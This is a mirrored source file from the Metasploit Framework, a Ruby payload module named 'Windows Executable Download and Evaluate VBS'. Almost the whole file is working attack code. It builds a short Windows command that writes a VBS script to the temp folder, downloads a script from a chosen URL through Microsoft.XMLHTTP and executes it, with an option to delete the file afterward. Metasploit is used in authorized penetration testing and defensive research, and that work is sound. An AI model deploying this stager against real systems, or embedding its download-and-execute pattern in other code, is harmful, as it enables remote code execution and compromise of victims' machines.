CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/cmd/windows/download_eval_vbs.rb
Views: 11777
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6


7
module MetasploitModule

8


9
  CachedSize = :dynamic

10


11
  include Msf::Payload::Single

12
  include Msf::Sessions::CommandShellOptions

13


14
  def initialize(info = {})

15
    super(merge_info(info,

16
      'Name'        => 'Windows Executable Download and Evaluate VBS',

17
      'Description' => 'Downloads a file from an HTTP(S) URL and executes it as a vbs script.

18
            Use it to stage a vbs encoded payload from a short command line. ',

19
      'Author'      => 'scriptjunkie',

20
      'License'     => BSD_LICENSE,

21
      'Platform'    => 'win',

22
      'Arch'        => ARCH_CMD,

23
      'Handler'     => Msf::Handler::None,

24
      'Session'     => Msf::Sessions::CommandShell,

25
      'PayloadType' => 'cmd',

26
      'RequiredCmd' => 'wscript',

27
      'Payload'     =>

28
        {

29
          'Offsets' => { },

30
          'Payload' => ''

31
        }

32
      ))

33


34
    register_options(

35
      [

36
        OptString.new('URL', [ true, "The pre-encoded URL to the script" ]),

37
        OptBool.new('INCLUDECMD', [ true, "Include the cmd /q /c", false ]),

38
        OptBool.new('INCLUDEWSCRIPT', [ true, "Include the wscript command", false ]),

39
        OptBool.new('DELETE', [ true, "Delete created .vbs after download", false ])

40
      ])

41
  end

42


43
  def generate(_opts = {})

44
    return super + command_string

45
  end

46


47
  def command_string

48
    # Keep variable names short.

49
    vbsname = Rex::Text.rand_text_alpha(1+rand(2))

50
    xmlhttpvar = Rex::Text.rand_text_alpha(1+rand(2))

51


52
    command = ''

53
    command << "cmd.exe /q /c " if datastore['INCLUDECMD']

54
    command << "cd %tmp%&echo Set #{xmlhttpvar}=CreateObject(\"Microsoft.XMLHTTP\"):"+

55
      "#{xmlhttpvar}.Open \"GET\",\"#{datastore['URL']}\",False:"+

56
      "#{xmlhttpvar}.Send:"+

57
      "Execute #{xmlhttpvar}.responseText"

58
    command << ":CreateObject(\"Scripting.FileSystemObject\").DeleteFile \"#{vbsname}.vbs\"" if datastore['DELETE']

59


60
    # "start #{vbsname}.vbs" instead of just "#{vbsname}.vbs" so that the console window

61
    # disappears quickly before the wscript libraries load and the file downloads

62
    command << " >#{vbsname}.vbs"+

63
      "&start "

64
    command << "wscript " if datastore['INCLUDEWSCRIPT']

65
    command << "#{vbsname}.vbs"

66
  end

67
end

68


69